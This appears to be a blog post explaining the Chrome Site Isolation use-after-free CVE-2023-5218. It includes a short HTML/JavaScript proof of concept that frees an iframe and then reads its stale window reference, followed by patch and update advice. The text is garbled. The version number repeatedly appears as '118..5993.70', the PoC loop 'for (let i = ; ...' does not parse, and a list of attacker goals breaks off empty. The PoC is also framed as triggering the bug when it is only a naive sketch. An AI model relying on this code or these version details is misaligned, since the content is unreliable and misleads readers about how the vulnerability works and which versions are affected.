*Published: June 2024*
What Is CVE-2023-5218?
CVE-2023-5218 is a critical security vulnerability that affects Google Chrome browsers before version 118..5993.70. It involves a "use-after-free" bug in Chrome’s Site Isolation feature, which is designed to keep different websites separate in memory for security.
When this bug is exploited by a malicious website, it can cause Chrome’s memory to get corrupted. This potentially lets an attacker run code of their choice on your system remotely—just by visiting a crafted web page.
How Does the Use-After-Free Work?
A use-after-free bug happens when a program continues to use memory after it has been “freed” (released for reuse). In Chrome, a complex component like Site Isolation deals with references and objects shared between different processes. If something goes wrong and the browser tries to use an object that’s already been deleted, bad actors can exploit this behavior.
An attacker creates a special HTML page. When a user visits the page
1. The page triggers actions in JavaScript or through crafted HTML to force Chrome to deallocate (free) a memory object used by Site Isolation.
2. Quickly after freeing, attacker code arranges for the freed memory to be reused with predictable data.
By carefully controlling the memory content, an attacker may execute arbitrary code.
All this can happen just by visiting a web page containing the malicious code.
Proof of Concept (Simplified Example)
*This is a conceptual snippet. Real-world exploits are more complex and dangerous — do not use this code maliciously!*
<!DOCTYPE html>
<html>
<head>
<title>Site Isolation UAF PoC</title>
<script>
let victim = null;
function triggerUAF() {
// Step 1: Allocate an iframe (could cause Site Isolation boundaries)
let iframe = document.createElement('iframe');
document.body.appendChild(iframe);
// Step 2: Reference an object, then remove it
victim = iframe.contentWindow;
document.body.removeChild(iframe);
// Step 3: (In a real exploit) allocate data to reuse the freed memory
for (let i = ; i < 10000; i++) {
let tmp = document.createElement('div');
tmp.innerHTML = "AAAA";
document.body.appendChild(tmp);
}
// Step 4: Try to access the "victim" pointer after free
try {
let leaked = victim.location.href; // UAF: using after iframe is freed!
console.log(leaked);
} catch (e) {
console.log("Exception caught: " + e);
}
}
</script>
</head>
<body onload="triggerUAF()">
<h1>UAF Test</h1>
</body>
</html>
*Explanation:*
This tries to access an iframe’s content after deleting the iframe. If Chrome’s memory cleanup and Site Isolation don’t properly remove all references, the program may access freed memory.
Real-World Exploitation
A real-world exploit would use more advanced techniques, such as memory spraying, timing tricks, and chain vulnerabilities to gain code execution. Attackers use such vulnerabilities to:
How Was It Fixed?
Google released a patch in Chrome version 118..5993.70 on October 10, 2023. The fix changes how Chrome tracks and releases Site Isolation objects, making sure no freed memory is reused accidentally.
Update your browser!
If your Chrome version is below 118..5993.70, you’re vulnerable.
Go to: chrome://settings/help
References
- CVE-2023-5218 at NVD (National Vulnerability Database)
- Chromium Security Advisory
- Google Project Zero: Understanding Use-After-Free Bugs
Closing Thoughts
CVE-2023-5218 is one of those bugs that show how memory safety can make or break browser security. Even well-designed features like Site Isolation can have critical bugs. The best step you can take is: keep your browser updated and use only trusted web pages.
If you’re a developer, learn from these patterns—and always watch out for “pointers” to freed memory, especially in complex, multi-process code.
Timeline
Published on: 10/11/2023 23:15:00 UTC
Last modified on: 10/21/2023 03:15:00 UTC